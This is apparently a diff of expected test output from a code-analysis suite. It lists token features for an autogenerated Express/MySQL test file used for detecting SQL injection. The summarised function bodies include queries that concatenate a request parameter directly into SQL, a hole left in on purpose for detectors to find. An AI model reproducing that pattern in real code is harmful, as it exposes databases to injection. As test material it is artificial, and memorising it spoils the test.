exceptional return of function handler | fileImports | express mysql | | autogenerated/NosqlAndSqlInjection/untyped/mysql.js:5:19:22:1 | functio ... });\\n} | CalleeFlexibleAccessPath | app.get | | autogenerated/NosqlAndSqlInjection/untyped/mysql.js:5:19:22:1 | functio ... });\\n} | InputArgumentIndex | 1 | | autogenerated/NosqlAndSqlInjection/untyped/mysql.js:5:19:22:1 | functio ... });\\n} | calleeImports | express | @@ -3327,6 +16208,119 @@ tokenFeatures | autogenerated/NosqlAndSqlInjection/untyped/mysql.js:5:19:22:1 | functio ... });\\n} | contextSurroundingFunctionParameters | (req, res) | | autogenerated/NosqlAndSqlInjection/untyped/mysql.js:5:19:22:1 | functio ... });\\n} | fileImports | express mysql | | autogenerated/NosqlAndSqlInjection/untyped/mysql.js:5:19:22:1 | functio ... });\\n} | receiverName | app | +| autogenerated/NosqlAndSqlInjection/untyped/mysql.js:5:19:22:1 | return of function handler | contextFunctionInterfaces | handler(req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mysql.js:5:19:22:1 | return of function handler | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mysql.js:5:19:22:1 | return of function handler | enclosingFunctionBody | req res temp req params value pool getConnection err connection connection query sql SELECT * FROM `books` WHERE `author` = ? values temp error results fields pool getConnection err connection connection query sql SELECT * FROM `books` WHERE `author` = temp error results fields pool getConnection err connection connection query SELECT * FROM `books` WHERE `author` = temp error results fields | +| autogenerated/NosqlAndSqlInjection/untyped/mysql.js:5:19:22:1 | return of function handler | enclosingFunctionName | handler | +| autogenerated/NosqlAndSqlInjection/untyped/mysql.js:5:19:22:1 | return of function handler | fileImports | express mysql | +| autogenerated/NosqlAndSqlInjection/untyped/mysql.js:5:28:5:34 | handler | contextFunctionInterfaces | handler(req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mysql.js:5:28:5:34 | handler | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mysql.js:5:28:5:34 | handler | enclosingFunctionBody | req res temp req params value pool getConnection err connection connection query sql SELECT * FROM `books` WHERE `author` = ? values temp error results fields pool getConnection err connection connection query sql SELECT * FROM `books` WHERE `author` = temp error results fields pool getConnection err connection connection query SELECT * FROM `books` WHERE `author` = temp error results fields | +| autogenerated/NosqlAndSqlInjection/untyped/mysql.js:5:28:5:34 | handler | enclosingFunctionName | handler | +| autogenerated/NosqlAndSqlInjection/untyped/mysql.js:5:28:5:34 | handler | fileImports | express mysql | +| autogenerated/NosqlAndSqlInjection/untyped/mysql.js:5:36:5:38 | req | contextFunctionInterfaces | handler(req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mysql.js:5:36:5:38 | req | contextFunctionInterfaces | handler(req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mysql.js:5:36:5:38 | req | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mysql.js:5:36:5:38 | req | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mysql.js:5:36:5:38 | req | enclosingFunctionBody | req res temp req params value pool getConnection err connection connection query sql SELECT * FROM `books` WHERE `author` = ? values temp error results fields pool getConnection err connection connection query sql SELECT * FROM `books` WHERE `author` = temp error results fields pool getConnection err connection connection query SELECT * FROM `books` WHERE `author` = temp error results fields | +| autogenerated/NosqlAndSqlInjection/untyped/mysql.js:5:36:5:38 | req | enclosingFunctionBody | req res temp req params value pool getConnection err connection connection query sql SELECT * FROM `books` WHERE `author` = ? values temp error results fields pool getConnection err connection connection query sql SELECT * FROM `books` WHERE `author` = temp error results fields pool getConnection err connection connection query SELECT * FROM `books` WHERE `author` = temp error results fields | +| autogenerated/NosqlAndSqlInjection/untyped/mysql.js:5:36:5:38 | req | enclosingFunctionName | handler | +| autogenerated/NosqlAndSqlInjection/untyped/mysql.js:5:36:5:38 | req | enclosingFunctionName | handler | +| autogenerated/NosqlAndSqlInjection/untyped/mysql.js:5:36:5:38 | req | fileImports | express mysql | +| autogenerated/NosqlAndSqlInjection/untyped/mysql.js:5:36:5:38 | req | fileImports | express mysql | +| autogenerated/NosqlAndSqlInjection/untyped/mysql.js:5:41:5:43 | res | contextFunctionInterfaces | handler(req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mysql.js:5:41:5:43 | res | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mysql.js:5:41:5:43 | res | enclosingFunctionBody | req res temp req params value pool getConnection err connection connection query sql SELECT * FROM `books` WHERE `author` = ? values temp error results fields pool getConnection err connection connection query sql SELECT * FROM `books` WHERE `author` = temp error results fields pool getConnection err connection connection query SELECT * FROM `books` WHERE `author` = temp error results fields | +| autogenerated/NosqlAndSqlInjection/untyped/mysql.js:5:41:5:43 | res | enclosingFunctionName | handler | +| autogenerated/NosqlAndSqlInjection/untyped/mysql.js:5:41:5:43 | res | fileImports | express mysql | +| autogenerated/NosqlAndSqlInjection/untyped/mysql.js:6:9:6:12 | temp | contextFunctionInterfaces | handler(req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mysql.js:6:9:6:12 | temp | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mysql.js:6:9:6:12 | temp | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mysql.js:6:9:6:12 | temp | enclosingFunctionBody | req res temp req params value pool getConnection err connection connection query sql SELECT * FROM `books` WHERE `author` = ? values temp error results fields pool getConnection err connection connection query sql SELECT * FROM `books` WHERE `author` = temp error results fields pool getConnection err connection connection query SELECT * FROM `books` WHERE `author` = temp error results fields | +| autogenerated/NosqlAndSqlInjection/untyped/mysql.js:6:9:6:12 | temp | enclosingFunctionBody | req res temp req params value pool getConnection err connection connection query sql SELECT * FROM `books` WHERE `author` = ? values temp error results fields pool getConnection err connection connection query sql SELECT * FROM `books` WHERE `author` = temp error results fields pool getConnection err connection connection query SELECT * FROM `books` WHERE `author` = temp error results fields | +| autogenerated/NosqlAndSqlInjection/untyped/mysql.js:6:9:6:12 | temp | enclosingFunctionName | handler | +| autogenerated/NosqlAndSqlInjection/untyped/mysql.js:6:9:6:12 | temp | enclosingFunctionName | handler | +| autogenerated/NosqlAndSqlInjection/untyped/mysql.js:6:9:6:12 | temp | fileImports | express mysql | +| autogenerated/NosqlAndSqlInjection/untyped/mysql.js:6:9:6:31 | temp | contextFunctionInterfaces | handler(req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mysql.js:6:9:6:31 | temp | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mysql.js:6:9:6:31 | temp | enclosingFunctionBody | req res temp req params value pool getConnection err connection connection query sql SELECT * FROM `books` WHERE `author` = ? values temp error results fields pool getConnection err connection connection query sql SELECT * FROM `books` WHERE `author` = temp error results fields pool getConnection err connection connection query SELECT * FROM `books` WHERE `author` = temp error results fields | +| autogenerated/NosqlAndSqlInjection/untyped/mysql.js:6:9:6:31 | temp | enclosingFunctionName | handler | +| autogenerated/NosqlAndSqlInjection/untyped/mysql.js:6:9:6:31 | temp | fileImports | express mysql | +| autogenerated/NosqlAndSqlInjection/untyped/mysql.js:6:9:6:31 | temp = ... s.value | contextFunctionInterfaces | handler(req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mysql.js:6:9:6:31 | temp = ... s.value | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mysql.js:6:9:6:31 | temp = ... s.value | enclosingFunctionBody | req res temp req params value pool getConnection err connection connection query sql SELECT * FROM `books` WHERE `author` = ? values temp error results fields pool getConnection err connection connection query sql SELECT * FROM `books` WHERE `author` = temp error results fields pool getConnection err connection connection query SELECT * FROM `books` WHERE `author` = temp error results fields | +| autogenerated/NosqlAndSqlInjection/untyped/mysql.js:6:9:6:31 | temp = ... s.value | enclosingFunctionName | handler | +| autogenerated/NosqlAndSqlInjection/untyped/mysql.js:6:9:6:31 | temp = ... s.value | fileImports | express mysql | +| autogenerated/NosqlAndSqlInjection/untyped/mysql.js:6:16:6:18 | req | contextFunctionInterfaces | handler(req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mysql.js:6:16:6:18 | req | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mysql.js:6:16:6:18 | req | enclosingFunctionBody | req res temp req params value pool getConnection err connection connection query sql SELECT * FROM `books` WHERE `author` = ? values temp error results fields pool getConnection err connection connection query sql SELECT * FROM `books` WHERE `author` = temp error results fields pool getConnection err connection connection query SELECT * FROM `books` WHERE `author` = temp error results fields | +| autogenerated/NosqlAndSqlInjection/untyped/mysql.js:6:16:6:18 | req | enclosingFunctionName | handler | +| autogenerated/NosqlAndSqlInjection/untyped/mysql.js:6:16:6:18 | req | fileImports | express mysql | +| autogenerated/NosqlAndSqlInjection/untyped/mysql.js:6:16:6:25 | req.params | contextFunctionInterfaces | handler(req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mysql.js:6:16:6:25 | req.params | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mysql.js:6:16:6:25 | req.params | enclosingFunctionBody | req res temp req params value pool getConnection err connection connection query sql SELECT * FROM `books` WHERE `author` = ? values temp error results fields pool getConnection err connection connection query sql SELECT * FROM `books` WHERE `author` = temp error results fields pool getConnection err connection connection query SELECT * FROM `books` WHERE `author` = temp error results fields | +| autogenerated/NosqlAndSqlInjection/untyped/mysql.js:6:16:6:25 | req.params | enclosingFunctionName | handler | +| autogenerated/NosqlAndSqlInjection/untyped/mysql.js:6:16:6:25 | req.params | fileImports | express mysql | +| autogenerated/NosqlAndSqlInjection/untyped/mysql.js:6:16:6:31 | req.params.value | contextFunctionInterfaces | handler(req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mysql.js:6:16:6:31 | req.params.value | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mysql.js:6:16:6:31 | req.params.value | enclosingFunctionBody | req res temp req params value pool getConnection err connection connection query sql SELECT * FROM `books` WHERE `author` = ? values temp error results fields pool getConnection err connection connection query sql SELECT * FROM `books` WHERE `author` = temp error results fields pool getConnection err connection connection query SELECT * FROM `books` WHERE `author` = temp error results fields | +| autogenerated/NosqlAndSqlInjection/untyped/mysql.js:6:16:6:31 | req.params.value | enclosingFunctionName | handler | +| autogenerated/NosqlAndSqlInjection/untyped/mysql.js:6:16:6:31 | req.params.value | fileImports | express mysql | +| autogenerated/NosqlAndSqlInjection/untyped/mysql.js:6:20:6:25 | params | contextFunctionInterfaces | handler(req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mysql.js:6:20:6:25 | params | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mysql.js:6:20:6:25 | params | enclosingFunctionBody | req res temp req params value pool getConnection err connection connection query sql SELECT * FROM `books` WHERE `author` = ? values temp error results fields pool getConnection err connection connection query sql SELECT * FROM `books` WHERE `author` = temp error results fields pool getConnection err connection connection query SELECT * FROM `books` WHERE `author` = temp error results fields | +| autogenerated/NosqlAndSqlInjection/untyped/mysql.js:6:20:6:25 | params | enclosingFunctionName | handler | +| autogenerated/NosqlAndSqlInjection/untyped/mysql.js:6:20:6:25 | params | fileImports | express mysql | +| autogenerated/NosqlAndSqlInjection/untyped/mysql.js:6:27:6:31 | value | contextFunctionInterfaces | handler(req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mysql.js:6:27:6:31 | value | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mysql.js:6:27:6:31 | value | enclosingFunctionBody | req res temp req params value pool getConnection err connection connection query sql SELECT * FROM `books` WHERE `author` = ? values temp error results fields pool getConnection err connection connection query sql SELECT * FROM `books` WHERE `author` = temp error results fields pool getConnection err connection connection query SELECT * FROM `books` WHERE `author` = temp error results fields | +| autogenerated/NosqlAndSqlInjection/untyped/mysql.js:6:27:6:31 | value | enclosingFunctionName | handler | +| autogenerated/NosqlAndSqlInjection/untyped/mysql.js:6:27:6:31 | value | fileImports | express mysql | +| autogenerated/NosqlAndSqlInjection/untyped/mysql.js:7:5:7:8 | pool | contextFunctionInterfaces | handler(req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mysql.js:7:5:7:8 | pool | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mysql.js:7:5:7:8 | pool | enclosingFunctionBody | req res temp req params value pool getConnection err connection connection query sql SELECT * FROM `books` WHERE `author` = ? values temp error results fields pool getConnection err connection connection query sql SELECT * FROM `books` WHERE `author` = temp error results fields pool getConnection err connection connection query SELECT * FROM `books` WHERE `author` = temp error results fields | +| autogenerated/NosqlAndSqlInjection/untyped/mysql.js:7:5:7:8 | pool | enclosingFunctionName | handler | +| autogenerated/NosqlAndSqlInjection/untyped/mysql.js:7:5:7:8 | pool | fileImports | express mysql | +| autogenerated/NosqlAndSqlInjection/untyped/mysql.js:7:5:7:22 | pool.getConnection | contextFunctionInterfaces | handler(req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mysql.js:7:5:7:22 | pool.getConnection | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mysql.js:7:5:7:22 | pool.getConnection | enclosingFunctionBody | req res temp req params value pool getConnection err connection connection query sql SELECT * FROM `books` WHERE `author` = ? values temp error results fields pool getConnection err connection connection query sql SELECT * FROM `books` WHERE `author` = temp error results fields pool getConnection err connection connection query SELECT * FROM `books` WHERE `author` = temp error results fields | +| autogenerated/NosqlAndSqlInjection/untyped/mysql.js:7:5:7:22 | pool.getConnection | enclosingFunctionName | handler | +| autogenerated/NosqlAndSqlInjection/untyped/mysql.js:7:5:7:22 | pool.getConnection | fileImports | express mysql | +| autogenerated/NosqlAndSqlInjection/untyped/mysql.js:7:5:12:6 | exceptional return of pool.ge ... \\n }) | contextFunctionInterfaces | handler(req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mysql.js:7:5:12:6 | exceptional return of pool.ge ... \\n }) | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mysql.js:7:5:12:6 | exceptional return of pool.ge ... \\n }) | enclosingFunctionBody | req res temp req params value pool getConnection err connection connection query sql SELECT * FROM `books` WHERE `author` = ? values temp error results fields pool getConnection err connection connection query sql SELECT * FROM `books` WHERE `author` = temp error results fields pool getConnection err connection connection query SELECT * FROM `books` WHERE `author` = temp error results fields | +| autogenerated/NosqlAndSqlInjection/untyped/mysql.js:7:5:12:6 | exceptional return of pool.ge ... \\n }) | enclosingFunctionName | handler | +| autogenerated/NosqlAndSqlInjection/untyped/mysql.js:7:5:12:6 | exceptional return of pool.ge ... \\n }) | fileImports | express mysql | +| autogenerated/NosqlAndSqlInjection/untyped/mysql.js:7:5:12:6 | pool.ge ... \\n }) | contextFunctionInterfaces | handler(req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mysql.js:7:5:12:6 | pool.ge ... \\n }) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mysql.js:7:5:12:6 | pool.ge ... \\n }) | enclosingFunctionBody | req res temp req params value pool getConnection err connection connection query sql SELECT * FROM `books` WHERE `author` = ? values temp error results fields pool getConnection err connection connection query sql SELECT * FROM `books` WHERE `author` = temp error results fields pool getConnection err connection connection query SELECT * FROM `books` WHERE `author` = temp error results fields | +| autogenerated/NosqlAndSqlInjection/untyped/mysql.js:7:5:12:6 | pool.ge ... \\n }) | enclosingFunctionName | handler | +| autogenerated/NosqlAndSqlInjection/untyped/mysql.js:7:5:12:6 | pool.ge ... \\n }) | fileImports | express mysql | +| autogenerated/NosqlAndSqlInjection/untyped/mysql.js:7:10:7:22 | getConnection | contextFunctionInterfaces | handler(req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mysql.js:7:10:7:22 | getConnection | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mysql.js:7:10:7:22 | getConnection | enclosingFunctionBody | req res temp req params value pool getConnection err connection connection query sql SELECT * FROM `books` WHERE `author` = ? values temp error results fields pool getConnection err connection connection query sql SELECT * FROM `books` WHERE `author` = temp error results fields pool getConnection err connection connection query SELECT * FROM `books` WHERE `author` = temp error results fields | +| autogenerated/NosqlAndSqlInjection/untyped/mysql.js:7:10:7:22 | getConnection | enclosingFunctionName | handler | +| autogenerated/NosqlAndSqlInjection/untyped/mysql.js:7:10:7:22 | getConnection | fileImports | express mysql | +| autogenerated/NosqlAndSqlInjection/untyped/mysql.js:7:24:7:23 | temp | contextFunctionInterfaces | handler(req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mysql.js:7:24:7:23 | temp | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mysql.js:7:24:7:23 | temp | enclosingFunctionBody | req res temp req params value pool getConnection err connection connection query sql SELECT * FROM `books` WHERE `author` = ? values temp error results fields pool getConnection err connection connection query sql SELECT * FROM `books` WHERE `author` = temp error results fields pool getConnection err connection connection query SELECT * FROM `books` WHERE `author` = temp error results fields | +| autogenerated/NosqlAndSqlInjection/untyped/mysql.js:7:24:7:23 | temp | enclosingFunctionName | handler | +| autogenerated/NosqlAndSqlInjection/untyped/mysql.js:7:24:7:23 | temp | fileImports | express mysql | +| autogenerated/NosqlAndSqlInjection/untyped/mysql.js:7:24:7:23 | this | contextFunctionInterfaces | handler(req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mysql.js:7:24:7:23 | this | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mysql.js:7:24:7:23 | this | enclosingFunctionBody | req res temp req params value pool getConnection err connection connection query sql SELECT * FROM `books` WHERE `author` = ? values temp error results fields pool getConnection err connection connection query sql SELECT * FROM `books` WHERE `author` = temp error results fields pool getConnection err connection connection query SELECT * FROM `books` WHERE `author` = temp error results fields | +| autogenerated/NosqlAndSqlInjection/untyped/mysql.js:7:24:7:23 | this | enclosingFunctionName | handler | +| autogenerated/NosqlAndSqlInjection/untyped/mysql.js:7:24:7:23 | this | fileImports | express mysql | +| autogenerated/NosqlAndSqlInjection/untyped/mysql.js:7:24:12:5 | 'arguments' object of anonymous function | contextFunctionInterfaces | handler(req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mysql.js:7:24:12:5 | 'arguments' object of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mysql.js:7:24:12:5 | 'arguments' object of anonymous function | enclosingFunctionBody | req res temp req params value pool getConnection err connection connection query sql SELECT * FROM `books` WHERE `author` = ? values temp error results fields pool getConnection err connection connection query sql SELECT * FROM `books` WHERE `author` = temp error results fields pool getConnection err connection connection query SELECT * FROM `books` WHERE `author` = temp error results fields | +| autogenerated/NosqlAndSqlInjection/untyped/mysql.js:7:24:12:5 | 'arguments' object of anonymous function | enclosingFunctionName | handler | +| autogenerated/NosqlAndSqlInjection/untyped/mysql.js:7:24:12:5 | 'arguments' object of anonymous function | fileImports | express mysql | +| autogenerated/NosqlAndSqlInjection/untyped/mysql.js:7:24:12:5 | exceptional return of anonymous function | contextFunctionInterfaces | handler(req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mysql.js:7:24:12:5 | exceptional return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mysql.js:7:24:12:5 | exceptional return of anonymous function | enclosingFunctionBody | req res temp req params value pool getConnection err connection connection query sql SELECT * FROM `books` WHERE `author` = ? values temp error results fields pool getConnection err connection connection query sql SELECT * FROM `books` WHERE `author` = temp error results fields pool getConnection err connection connection query SELECT * FROM `books` WHERE `author` = temp error results fields | +| autogenerated/NosqlAndSqlInjection/untyped/mysql.js:7:24:12:5 | exceptional return of anonymous function | enclosingFunctionName | handler | +| autogenerated/NosqlAndSqlInjection/untyped/mysql.js:7:24:12:5 | exceptional return of anonymous function | fileImports | express mysql | | autogenerated/NosqlAndSqlInjection/untyped/mysql.js:7:24:12:5 | functio ... ;\\n } | CalleeFlexibleAccessPath | pool.getConnection | | autogenerated/NosqlAndSqlInjection/untyped/mysql.js:7:24:12:5 | functio ... ;\\n } | InputArgumentIndex | 0 | | autogenerated/NosqlAndSqlInjection/untyped/mysql.js:7:24:12:5 | functio ... ;\\n } | calleeImports | mysql | @@ -3336,6 +16330,51 @@ tokenFeatures | autogenerated/NosqlAndSqlInjection/untyped/mysql.js:7:24:12:5 | functio ... ;\\n } | enclosingFunctionName | handler | | autogenerated/NosqlAndSqlInjection/untyped/mysql.js:7:24:12:5 | functio ... ;\\n } | fileImports | express mysql | | autogenerated/NosqlAndSqlInjection/untyped/mysql.js:7:24:12:5 | functio ... ;\\n } | receiverName | pool | +| autogenerated/NosqlAndSqlInjection/untyped/mysql.js:7:24:12:5 | return of anonymous function | contextFunctionInterfaces | handler(req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mysql.js:7:24:12:5 | return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mysql.js:7:24:12:5 | return of anonymous function | enclosingFunctionBody | req res temp req params value pool getConnection err connection connection query sql SELECT * FROM `books` WHERE `author` = ? values temp error results fields pool getConnection err connection connection query sql SELECT * FROM `books` WHERE `author` = temp error results fields pool getConnection err connection connection query SELECT * FROM `books` WHERE `author` = temp error results fields | +| autogenerated/NosqlAndSqlInjection/untyped/mysql.js:7:24:12:5 | return of anonymous function | enclosingFunctionName | handler | +| autogenerated/NosqlAndSqlInjection/untyped/mysql.js:7:24:12:5 | return of anonymous function | fileImports | express mysql | +| autogenerated/NosqlAndSqlInjection/untyped/mysql.js:7:33:7:35 | err | contextFunctionInterfaces | handler(req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mysql.js:7:33:7:35 | err | contextSurroundingFunctionParameters | (req, res)\n(err, connection) | +| autogenerated/NosqlAndSqlInjection/untyped/mysql.js:7:33:7:35 | err | enclosingFunctionBody | req res temp req params value pool getConnection err connection connection query sql SELECT * FROM `books` WHERE `author` = ? values temp error results fields pool getConnection err connection connection query sql SELECT * FROM `books` WHERE `author` = temp error results fields pool getConnection err connection connection query SELECT * FROM `books` WHERE `author` = temp error results fields | +| autogenerated/NosqlAndSqlInjection/untyped/mysql.js:7:33:7:35 | err | enclosingFunctionName | handler | +| autogenerated/NosqlAndSqlInjection/untyped/mysql.js:7:33:7:35 | err | fileImports | express mysql | +| autogenerated/NosqlAndSqlInjection/untyped/mysql.js:7:38:7:47 | connection | contextFunctionInterfaces | handler(req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mysql.js:7:38:7:47 | connection | contextFunctionInterfaces | handler(req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mysql.js:7:38:7:47 | connection | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mysql.js:7:38:7:47 | connection | contextSurroundingFunctionParameters | (req, res)\n(err, connection) | +| autogenerated/NosqlAndSqlInjection/untyped/mysql.js:7:38:7:47 | connection | enclosingFunctionBody | req res temp req params value pool getConnection err connection connection query sql SELECT * FROM `books` WHERE `author` = ? values temp error results fields pool getConnection err connection connection query sql SELECT * FROM `books` WHERE `author` = temp error results fields pool getConnection err connection connection query SELECT * FROM `books` WHERE `author` = temp error results fields | +| autogenerated/NosqlAndSqlInjection/untyped/mysql.js:7:38:7:47 | connection | enclosingFunctionBody | req res temp req params value pool getConnection err connection connection query sql SELECT * FROM `books` WHERE `author` = ? values temp error results fields pool getConnection err connection connection query sql SELECT * FROM `books` WHERE `author` = temp error results fields pool getConnection err connection connection query SELECT * FROM `books` WHERE `author` = temp error results fields | +| autogenerated/NosqlAndSqlInjection/untyped/mysql.js:7:38:7:47 | connection | enclosingFunctionName | handler | +| autogenerated/NosqlAndSqlInjection/untyped/mysql.js:7:38:7:47 | connection | enclosingFunctionName | handler | +| autogenerated/NosqlAndSqlInjection/untyped/mysql.js:7:38:7:47 | connection | fileImports | express mysql | +| autogenerated/NosqlAndSqlInjection/untyped/mysql.js:7:38:7:47 | connection | fileImports | express mysql | +| autogenerated/NosqlAndSqlInjection/untyped/mysql.js:8:9:8:18 | connection | contextFunctionInterfaces | handler(req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mysql.js:8:9:8:18 | connection | contextSurroundingFunctionParameters | (req, res)\n(err, connection) | +| autogenerated/NosqlAndSqlInjection/untyped/mysql.js:8:9:8:18 | connection | enclosingFunctionBody | req res temp req params value pool getConnection err connection connection query sql SELECT * FROM `books` WHERE `author` = ? values temp error results fields pool getConnection err connection connection query sql SELECT * FROM `books` WHERE `author` = temp error results fields pool getConnection err connection connection query SELECT * FROM `books` WHERE `author` = temp error results fields | +| autogenerated/NosqlAndSqlInjection/untyped/mysql.js:8:9:8:18 | connection | enclosingFunctionName | handler | +| autogenerated/NosqlAndSqlInjection/untyped/mysql.js:8:9:8:18 | connection | fileImports | express mysql | +| autogenerated/NosqlAndSqlInjection/untyped/mysql.js:8:9:8:24 | connection.query | contextFunctionInterfaces | handler(req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mysql.js:8:9:8:24 | connection.query | contextSurroundingFunctionParameters | (req, res)\n(err, connection) | +| autogenerated/NosqlAndSqlInjection/untyped/mysql.js:8:9:8:24 | connection.query | enclosingFunctionBody | req res temp req params value pool getConnection err connection connection query sql SELECT * FROM `books` WHERE `author` = ? values temp error results fields pool getConnection err connection connection query sql SELECT * FROM `books` WHERE `author` = temp error results fields pool getConnection err connection connection query SELECT * FROM `books` WHERE `author` = temp error results fields | +| autogenerated/NosqlAndSqlInjection/untyped/mysql.js:8:9:8:24 | connection.query | enclosingFunctionName | handler | +| autogenerated/NosqlAndSqlInjection/untyped/mysql.js:8:9:8:24 | connection.query | fileImports | express mysql | +| autogenerated/NosqlAndSqlInjection/untyped/mysql.js:8:9:11:47 | connect ... ds) {}) | contextFunctionInterfaces | handler(req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mysql.js:8:9:11:47 | connect ... ds) {}) | contextSurroundingFunctionParameters | (req, res)\n(err, connection) | +| autogenerated/NosqlAndSqlInjection/untyped/mysql.js:8:9:11:47 | connect ... ds) {}) | enclosingFunctionBody | req res temp req params value pool getConnection err connection connection query sql SELECT * FROM `books` WHERE `author` = ? values temp error results fields pool getConnection err connection connection query sql SELECT * FROM `books` WHERE `author` = temp error results fields pool getConnection err connection connection query SELECT * FROM `books` WHERE `author` = temp error results fields | +| autogenerated/NosqlAndSqlInjection/untyped/mysql.js:8:9:11:47 | connect ... ds) {}) | enclosingFunctionName | handler | +| autogenerated/NosqlAndSqlInjection/untyped/mysql.js:8:9:11:47 | connect ... ds) {}) | fileImports | express mysql | +| autogenerated/NosqlAndSqlInjection/untyped/mysql.js:8:9:11:47 | exceptional return of connect ... ds) {}) | contextFunctionInterfaces | handler(req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mysql.js:8:9:11:47 | exceptional return of connect ... ds) {}) | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mysql.js:8:9:11:47 | exceptional return of connect ... ds) {}) | enclosingFunctionBody | req res temp req params value pool getConnection err connection connection query sql SELECT * FROM `books` WHERE `author` = ? values temp error results fields pool getConnection err connection connection query sql SELECT * FROM `books` WHERE `author` = temp error results fields pool getConnection err connection connection query SELECT * FROM `books` WHERE `author` = temp error results fields | +| autogenerated/NosqlAndSqlInjection/untyped/mysql.js:8:9:11:47 | exceptional return of connect ... ds) {}) | enclosingFunctionName | handler | +| autogenerated/NosqlAndSqlInjection/untyped/mysql.js:8:9:11:47 | exceptional return of connect ... ds) {}) | fileImports | express mysql | +| autogenerated/NosqlAndSqlInjection/untyped/mysql.js:8:20:8:24 | query | contextFunctionInterfaces | handler(req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mysql.js:8:20:8:24 | query | contextSurroundingFunctionParameters | (req, res)\n(err, connection) | +| autogenerated/NosqlAndSqlInjection/untyped/mysql.js:8:20:8:24 | query | enclosingFunctionBody | req res temp req params value pool getConnection err connection connection query sql SELECT * FROM `books` WHERE `author` = ? values temp error results fields pool getConnection err connection connection query sql SELECT * FROM `books` WHERE `author` = temp error results fields pool getConnection err connection connection query SELECT * FROM `books` WHERE `author` = temp error results fields | +| autogenerated/NosqlAndSqlInjection/untyped/mysql.js:8:20:8:24 | query | enclosingFunctionName | handler | +| autogenerated/NosqlAndSqlInjection/untyped/mysql.js:8:20:8:24 | query | fileImports | express mysql | | autogenerated/NosqlAndSqlInjection/untyped/mysql.js:8:26:11:9 | {\\n ... } | CalleeFlexibleAccessPath | connection.query | | autogenerated/NosqlAndSqlInjection/untyped/mysql.js:8:26:11:9 | {\\n ... } | InputArgumentIndex | 0 | | autogenerated/NosqlAndSqlInjection/untyped/mysql.js:8:26:11:9 | {\\n ... } | contextFunctionInterfaces | handler(req, res) | @@ -3344,6 +16383,21 @@ tokenFeatures | autogenerated/NosqlAndSqlInjection/untyped/mysql.js:8:26:11:9 | {\\n ... } | enclosingFunctionName | handler | | autogenerated/NosqlAndSqlInjection/untyped/mysql.js:8:26:11:9 | {\\n ... } | fileImports | express mysql | | autogenerated/NosqlAndSqlInjection/untyped/mysql.js:8:26:11:9 | {\\n ... } | receiverName | connection | +| autogenerated/NosqlAndSqlInjection/untyped/mysql.js:9:13:9:15 | sql | contextFunctionInterfaces | handler(req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mysql.js:9:13:9:15 | sql | contextSurroundingFunctionParameters | (req, res)\n(err, connection) | +| 